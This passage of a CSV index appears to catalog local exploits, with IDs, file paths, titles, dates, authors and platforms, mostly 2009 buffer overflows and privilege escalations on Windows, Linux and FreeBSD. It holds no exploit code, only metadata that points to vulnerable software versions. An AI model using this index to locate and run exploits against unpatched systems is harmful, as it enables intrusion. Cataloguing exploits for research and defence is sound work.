1.0 - '.ht3' Local Buffer Overflow (SEH)",2009-06-29,hack4love,local,windows, +9038,exploits/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,local,windows, +9047,exploits/windows/local/9047.pl,"TFM MMPlayer 2.0 - '.m3u'/'.ppl' Universal Buffer Overflow (SEH)",2009-06-30,"ThE g0bL!N",local,windows, +9060,exploits/windows/local/9060.pl,"MP3-Nator 2.0 - '.plf' Universal Buffer Overflow (SEH)",2009-07-01,"ThE g0bL!N",local,windows, +9064,exploits/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,local,windows, +9070,exploits/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,local,windows, +9072,exploits/multiple/local/9072.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (2)",2009-07-02,"Sumit Siddharth",local,multiple, +9082,exploits/freebsd/local/9082.c,"FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation",2009-07-09,"Patroklos Argyroudis",local,freebsd, +9083,exploits/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation",2009-07-09,sgrakkyu,local,lin_x86-64, +9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,local,multiple, +9104,exploits/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,local,windows, +9135,exploits/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,local,linux, +9136,exploits/windows/local/9136.pl,"Mp3-Nator 2.0 - 'ListData.dat' Universal Buffer Overflow (SEH)",2009-07-13,"ThE g0bL!N",local,windows, +9142,exploits/windows/local/9142.c,"Live For Speed 2 Version Z - '.Mpr' Local Buffer Overflow",2009-07-14,n00b,local,windows, +9146,exploits/windows/local/9146.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow",2009-07-14,[0]x80->[H]4x²0r,local,windows, +9148,exploits/windows/local/9148.py,"Live For Speed 2 Version Z - '.mpr' Local Buffer Overflow (SEH)",2009-07-14,His0k4,local,windows, +9149,exploits/windows/local/9149.pl,"Icarus 2.0 - '.icp' Local Buffer Overflow (SEH)",2009-07-15,hack4love,local,windows, +9152,exploits/windows/local/9152.pl,"AudioPLUS 2.00.215 - '.m3u' / '.lst' Universal Overwrite (SEH)",2009-07-15,Stack,local,windows, +9172,exploits/windows/local/9172.pl,"Hamster Audio Player 0.3a - Universal Buffer Overflow (SEH)",2009-07-16,"ThE g0bL!N",local,windows, +9177,exploits/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow",2009-07-16,Crazy_Hacker,local,windows, +9186,exploits/windows/local/9186.pl,"Easy RM to MP3 Converter - '.m3u' Universal Stack Overflow",2009-07-17,Stack,local,windows, +9190,exploits/windows/local/9190.pl,"htmldoc 1.8.27.1 - '.html' Universal Stack Overflow",2009-07-17,ksa04,local,windows, +9191,exploits/linux/local/9191.txt,"Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation",2009-07-17,spender,local,linux, +9199,exploits/windows/local/9199.txt,"Adobe 9.x Related Service - 'getPlus_HelperSvc.exe' Local Privilege Escalation",2009-07-20,Nine:Situations:Group,local,windows, +9207,exploits/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation",2009-07-20,anonymous,local,linux, +9208,exploits/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,local,linux, +9215,exploits/windows/local/9215.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,local,windows, +9216,exploits/windows/local/9216.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,local,windows, +9221,exploits/windows/local/9221.pl,"WINMOD 1.4 - '.lst' Local Buffer Overflow (SEH)",2009-07-21,hack4love,local,windows, +9223,exploits/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation",2009-07-21,"Jeremy Brown",local,windows, +9229,exploits/windows/local/9229.py,"WINMOD 1.4 - '.lst' Universal Buffer Overflow (SEH) (2)",2009-07-22,Dz_Girl,local,windows, +9234,exploits/windows/local/9234.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow",2009-07-23,"CWH Underground",local,windows, +40297,exploits/windows/local/40297.py,"NScan 0.9.1 - 'Target' Local Buffer Overflow",2016-08-29,hyp3rlinx,local,windows, +9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation (Python)",2009-07-27,Dr_IDE,local,windows, +9286,exploits/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,local,windows, +9291,exploits/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)",2009-07-28,Koshi,local,windows, +9298,exploits/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,local,windows, +9299,exploits/windows/local/9299.pl,"WINMOD 1.4 - '.lst' File Local Stack Overflow XP SP3 (RET + SEH) (3)",2009-07-28,corelanc0d3r,local,windows, +9301,exploits/windows/local/9301.txt,"Microsoft Windows XP - 'win32k.sys' Local Privilege Escalation",2009-07-30,"NT Internals",local,windows, +9302,exploits/linux/local/9302.py,"Compface 1.1.5 - '.xbm' Local Buffer Overflow",2009-07-30,His0k4,local,linux, +9305,exploits/windows/local/9305.txt,"EPSON Status Monitor 3 - Local Privilege Escalation",2009-07-30,Nine:Situations:Group,local,windows, +9306,exploits/aix/local/9306.txt,"IBM AIX 5.3 - 'libc' MALLOCDEBUG File Overwrite",2009-07-30,Affix,local,aix, +9321,exploits/windows/local/9321.pl,"Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)",2009-08-01,"ThE g0bL!N",local,windows, +9329,exploits/windows/local/9329.pl,"BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow (SEH)",2009-08-03,hack4love,local,windows, +9343,exploits/windows/local/9343.pl,"Mediacoder 0.6.2.4275 - '.lst' Local Stack Buffer Overflow",2009-08-03,SkuLL-HackeR,local,windows, +9346,exploits/windows/local/9346.pl,"Blaze HDTV Player 6.0 - '.plf' Local Buffer Overflow (SEH)",2009-08-03,hack4love,local,windows, +9352,exploits/linux/local/9352.c,"Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure",2009-08-04,"Jon Oberheide",local,linux, +9354,exploits/windows/local/9354.pl,"Mediacoder 0.7.1.4486 - '.lst' Universal Buffer Overflow (SEH)",2009-08-04,germaya_x,local,windows, +9360,exploits/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)",2009-08-04,"ThE g0bL!N",local,windows, +9363,exploits/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",local,linux, +9366,exploits/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,local,windows, +9375,exploits/windows/local/9375.py,"JetAudio 7.1.9.4030 - '.m3u' Universal Stack Overflow (SEH)",2009-08-06,Dr_IDE,local,windows, +9377,exploits/windows/local/9377.pl,"A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)",2009-08-06,hack4love,local,windows, +9379,exploits/windows/local/9379.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' Local Stack Overflow (SEH)",2009-08-06,germaya_x,local,windows, +9386,exploits/windows/local/9386.txt,"Steam 54/894 - Local Privilege Escalation",2009-08-07,MrDoug,local,windows, +9409,exploits/windows/local/9409.pl,"Mediacoder 0.7.1.4490 - '.lst' / '.m3u' Universal Buffer Overflow (SEH)",2009-08-10,hack4love,local,windows, +9412,exploits/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (1)",2009-08-11,ahwak2000,local,windows, +9418,exploits/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (2)",2009-08-11,"ThE g0bL!N",local,windows, +9420,exploits/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (3)",2009-08-12,hack4love,local,windows, +9426,exploits/windows/local/9426.java,"FTPShell Client 4.1 RC2 - Name Session Stack Overflow",2009-08-13,zec,local,windows, +9428,exploits/windows/local/9428.pl,"pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer (SEH)",2009-08-13,hack4love,local,windows, +9435,exploits/linux/local/9435.txt,"Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)",2009-08-14,spender,local,linux, +9436,exploits/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Privilege Escalation (4)",2009-08-14,"Przemyslaw Frasunek",local,linux, +9458,exploits/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - '.xpl' Universal Local Buffer (SEH)",2009-08-18,hack4love,local,windows, +9466,exploits/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,local,windows, +9476,exploits/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,local,windows, +9477,exploits/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Local Privilege Escalation",2009-08-18,Zinx,local,android, +9479,exploits/linux/local/9479.c,"Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",local,linux, +9483,exploits/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow XP SP3 (SEH)",2009-08-24,corelanc0d3r,local,windows, +9486,exploits/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer (SEH)",2009-08-24,hack4love,local,windows, +9488,exploits/freebsd/local/9488.c,"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",local,freebsd, +9489,exploits/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Multiple Vulnerabilities",2009-08-24,kingcope,local,multiple, +9492,exploits/windows/local/9492.c,"Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow",2009-08-24,Heurs,local,windows, +9495,exploits/windows/local/9495.pl,"Fat Player 0.6b - '.wav' Universal Local Buffer",2009-08-24,ahwak2000,local,windows, +9501,exploits/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)",2009-08-24,mr_me,local,windows, +9509,exploits/windows/local/9509.pl,"Media Jukebox 8 - '.m3u' Universal Local Buffer (SEH)",2009-08-25,hack4love,local,windows, +9513,exploits/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)",2009-08-25,"Jon Oberheide",local,linux, +9519,exploits/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)",2009-08-25,hack4love,local,windows, +9520,exploits/multiple/local/9520.txt,"HyperVM - File Permissions Credential Disclosure",2009-08-25,"Xia Shing Zee",local,multiple, +9521,exploits/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)",2009-08-26,"Clément Lecigne",local,linux, +9536,exploits/windows/local/9536.py,"PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)",2009-08-28,mr_me,local,windows, +9540,exploits/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,local,windows, +9542,exploits/lin_x86/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",local,lin_x86, +9543,exploits/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",local,linux, +9545,exploits/linux/local/9545.c,"Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation",2009-08-31,"Ramon Valle",local,linux, +9548,exploits/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,local,windows, +9550,exploits/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,local,windows, +9551,exploits/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)",2009-08-31,mr_me,local,windows, +9560,exploits/windows/local/9560.txt,"Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow",2009-09-01,hack4love,local,windows, +9567,exploits/windows/local/9567.pl,"Hamster Audio Player 0.3a - 'Associations.cfg' Local Buffer (SEH) (1)",2009-09-01,"ThE g0bL!N",local,windows, +9568,exploits/windows/local/9568.py,"akPlayer 1.9.0 - '.plt' Universal Buffer Overflow (SEH)",2009-09-01,TiGeR-Dz,local,windows, +9574,exploits/linux/local/9574.txt,"Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)",2009-09-02,spender,local,linux, +9575,exploits/linux/local/9575.c,"Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3)",2009-09-02,Andi,local,linux, +9579,exploits/windows/local/9579.txt,"Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal",2009-09-03,kralor,local,windows, +9580,exploits/windows/local/9580.pl,"Hamster Audio Player 0.3a - 'Associations.cfg' Local Buffer (SEH) (2)",2009-09-03,hack4love,local,windows, +9581,exploits/windows/local/9581.pl,"SAP Player 0.9 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-03,PLATEN,local,windows, +9589,exploits/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)",2009-09-04,hack4love,local,windows, +9595,exploits/linux/local/9595.c,"HTMLDOC 1.8.27 - '.html' File Handling Stack Buffer Overflow",2009-09-09,"Pankaj Kohli",local,linux, +9598,exploits/linux/local/9598.txt,"Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)",2009-09-09,"Ramon Valle",local,linux, +9608,exploits/linux/local/9608.c,"GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow",2009-09-09,"Jeremy Brown",local,linux, +9610,exploits/windows/local/9610.py,"Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)",2009-09-09,blake,local,windows, +9618,exploits/windows/local/9618.php,"Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,local,windows, +9619,exploits/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus - vx(asx/wax/wvx) Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,local,windows, +9624,exploits/windows/local/9624.py,"KSP 2009R2 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-10,hack4love,local,windows, +9627,exploits/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Framework",2009-09-10,spender,local,linux, +9628,exploits/windows/local/9628.pl,"Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)",2009-09-10,germaya_x,local,windows, +9641,exploits/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)",2009-09-11,"Ramon Valle",local,linux, +9645,exploits/aix/local/9645.sh,"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",local,aix, +9655,exploits/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow",2009-09-14,PLATEN,local,windows, +9659,exploits/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC)",2009-09-14,"fl0 fl0w",local,windows, +9661,exploits/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,local,windows, +9680,exploits/windows/local/9680.txt,"Protector Plus AntiVirus 8/9 - Local Privilege Escalation",2009-09-15,"Maxim A. Kulakov",local,windows, +9687,exploits/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,local,windows, +9688,exploits/hardware/local/9688.txt,"NetAccess IP3 - Authenticated Ping Option Command Injection",2009-09-15,r00t,local,hardware, +9709,exploits/linux/local/9709.txt,"Changetrack 4.3-3 - Local Privilege Escalation",2009-09-17,Rick,local,linux, +9807,exploits/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,local,windows, +9831,exploits/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,local,windows, +9842,exploits/php/local/9842.txt,"PHP 5.3.0 - 'pdflib' Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",local,php, +9844,exploits/linux/local/9844.py,"Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3)",2009-11-05,"Matthew Bergin",local,linux, +9859,exploits/freebsd/local/9859.c,"FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition",2009-10-08,"Przemyslaw Frasunek",local,freebsd, +9860,exploits/freebsd/local/9860.c,"FreeBSD 7.2 - VFS/devfs Race Condition",2009-10-08,"Przemyslaw Frasunek",local,freebsd, +9865,exploits/windows/local/9865.py,"Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",local,windows, +9866,exploits/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 - Local Buffer Overflow",2009-10-29,Dr_IDE,local,windows, +9882,exploits/windows/local/9882.txt,"Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",local,windows, +9884,exploits/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)",2009-10-21,Dr_IDE,local,windows, +9894,exploits/windows/local/9894.txt,"Millenium MP3 Studio 2.0 - '.m3u' Local Buffer Overflow",2009-10-15,dellnull,local,windows, +9895,exploits/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - 'mpf' Local Buffer Overflow",2009-10-14,dellnull,local,windows, +9955,exploits/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Local Privilege Escalation",2009-10-20,trompele,local,hardware, +9970,exploits/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Local Privilege Escalation",2009-10-20,bellick,local,windows, +9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple, +9974,exploits/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist Overflow (SEH)",2009-11-16,corelanc0d3r,local,windows, +9983,exploits/windows/local/9983.pl,"Xion Audio Player 1.0 121 - '.m3u' Local Buffer Overflow (2)",2009-10-16,"Dragon Rider",local,windows, +9984,exploits/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 - '.xpas' File Buffer Overflow",2009-10-26,Dr_IDE,local,windows, +9985,exploits/multiple/local/9985.txt,"Xpdf 3.01 - Local Heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",local,multiple, +14273,exploits/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",local,linux, +9988,exploits/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation",2009-10-29,bellick,local,windows, +9990,exploits/multiple/local/9990.txt,"Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Overflow",2009-11-09,"Felipe Andres Manzano",local,multiple, +9991,exploits/windows/local/9991.txt,"Alleycode 2.21 - Local Overflow (SEH) (PoC)",2009-10-05,"Rafael Sousa",local,windows, +10009,exploits/windows/local/10009.txt,"Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",local,windows, +10010,exploits/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,local,windows, +10018,exploits/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)",2009-11-12,"Earl Chew",local,linux, +10038,exploits/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",local,linux, +10039,exploits/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant (PoC)",2009-10-23,Dr_IDE,local,windows, +10044,exploits/unix/local/10044.pl,"ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow",2009-10-12,"Michael Domberg",local,unix, +10060,exploits/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",local,linux, +10072,exploits/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",local,multiple, +10076,exploits/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,local,osx, +10078,exploits/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local (PoC)",2009-10-02,mu-b,local,osx, +33426,exploits/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",local,windows, +10084,exploits/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation",2009-10-13,"Maxim A. Kulakov",local,windows, +10201,exploits/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,local,windows, +10207,exploits/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0",2009-10-27,"Tavis Ormandy & Julien Tinnes",local,multiple, +10211,exploits/windows/local/10211.txt,"Autodesk SoftImage Scene TOC - Arbitrary Command Execution",2009-11-23,"Core Security",local,windows, +10213,exploits/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",local,windows, +10226,exploits/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Local Buffer Overflow",2009-11-25,Rick2600,local,windows, +10240,exploits/windows/local/10240.py,"Millenium MP3 Studio 2.0 - 'pls' Local Buffer Overflow",2009-11-28,Molotov,local,windows, +10244,exploits/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows",2009-11-28,"Christophe Devine",local,windows, +10255,exploits/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Local Privilege Escalation",2009-11-30,kingcope,local,bsd, +10264,exploits/multiple/local/10264.txt,"Oracle - SYS.LT.MERGEWORKSPACE Evil Cursor",2009-12-01,"Andrea Purificato",local,multiple, +10265,exploits/multiple/local/10265.txt,"Oracle - SYS.LT.COMPRESSWORKSPACETREE Evil Cursor",2009-12-01,"Andrea Purificato",local,multiple, +10266,exploits/multiple/local/10266.txt,"Oracle - ctxsys.drvxtabc.create_tables Evil Cursor",2009-12-01,"Andrea Purificato",local,multiple, +10267,exploits/multiple/local/10267.txt,"Oracle - ctxsys.drvxtabc.create_tables",2009-12-01,"Andrea Purificato",local,multiple, +10268,exploits/multiple/local/10268.txt,"Oracle - SYS.LT.REMOVEWORKSPACE Evil Cursor",2009-12-01,"Andrea Purificato",local,multiple, +10280,exploits/windows/local/10280.py,"AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow",2009-11-21,mr_me,local,windows, +10281,exploits/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript '.eps' Local Buffer Overflow",2009-12-03,pyrokinesis,local,windows, +10295,exploits/windows/local/10295.txt,"DAZ Studio - Arbitrary Command Execution",2009-12-03,"Core Security",local,windows, +10296,exploits/php/local/10296.txt,"PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",local,php, +10298,exploits/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Universal Buffer Overflow",2009-12-04,"fl0 fl0w",local,windows, +10313,exploits/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,local,linux, +10319,exploits/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,local,windows, +10320,exploits/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Local Buffer Overflow",2009-12-05,Encrypt3d.M!nd,local,windows, +10321,exploits/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,local,windows, +10322,exploits/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Local Buffer Overflow",2009-12-05,Encrypt3d.M!nd,local,windows, +10323,exploits/windows/local/10323.py,"HTML Help Workshop 4.74 - hhp Universal Buffer Overflow",2009-12-05,Dz_attacker,local,windows, +10326,exploits/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Local Buffer Overflow",2009-02-03,"Wolfgang Hamann",local,multiple, +10332,exploits/windows/local/10332.rb,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow (Metasploit)",2009-12-06,dookie,local,windows, +10335,exploits/windows/local/10335.rb,"HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (Metasploit)",2009-12-07,loneferret,local,windows, +10339,exploits/windows/local/10339.pl,"gAlan 0.2.1 - Local Buffer Overflow (1)",2009-12-07,"Jeremy Brown",local,windows, +10344,exploits/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (Metasploit)",2009-12-07,dookie,local,windows, +10345,exploits/windows/local/10345.py,"gAlan - '.galan' Universal Buffer Overflow",2009-12-07,Dz_attacker,local,windows, +10346,exploits/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,local,windows, +10353,exploits/windows/local/10353.pl,"Audio Workstation - '.pls' Local Buffer Overflow (SEH)",2009-09-24,germaya_x,local,windows, +10359,exploits/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - '.pls' Universal Local Buffer Overflow",2009-12-09,mr_me,local,windows, +10363,exploits/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Local Buffer Overflow (Metasploit)",2009-12-09,dookie,local,windows, +10371,exploits/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,local,windows, +10373,exploits/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",local,windows, +10374,exploits/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Local Buffer Overflow",2009-12-10,"Vinod Sharma",local,windows, +10392,exploits/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,local,windows, +10396,exploits/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",local,linux, +10423,exploits/windows/local/10423.pl,"RM Downloader 3.0.2.1 - '.m3u' Local Stack Overflow",2009-12-14,"Vinod Sharma",local,windows, +10475,exploits/windows/local/10475.txt,"QuickHeal AntiVirus 2010 - Local Privilege Escalation",2009-12-16,"Francis Provencher",local,windows, +10484,exploits/windows/local/10484.txt,"Kaspersky Lab (Multiple Products) - Local Privilege Escalation",2009-12-16,"Maxim A. Kulakov",local,windows, +10487,exploits/linux/local/10487.txt,"VideoCache 1.9.2 - 'vccleaner' Local Privilege Escalation",2009-12-16,"Dominick LaTrappe",local,linux, +10544,exploits/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",local,multiple, +10556,exploits/windows/local/10556.c,"PlayMeNow 7.3/7.4 - '.M3U' Playlist File Buffer",2009-12-19,Gr33nG0bL1n,local,windows, +10557,exploits/php/local/10557.php,"PHP 5.2.12/5.3.1 - 'symlink()' open_basedir Bypass",2009-12-19,"Maksymilian Arciemowicz",local,php, +10563,exploits/windows/local/10563.py,"PlayMeNow (Windows XP Universal) - '.M3U' Playlist Buffer Overflow",2009-12-19,loneferret,local,windows, 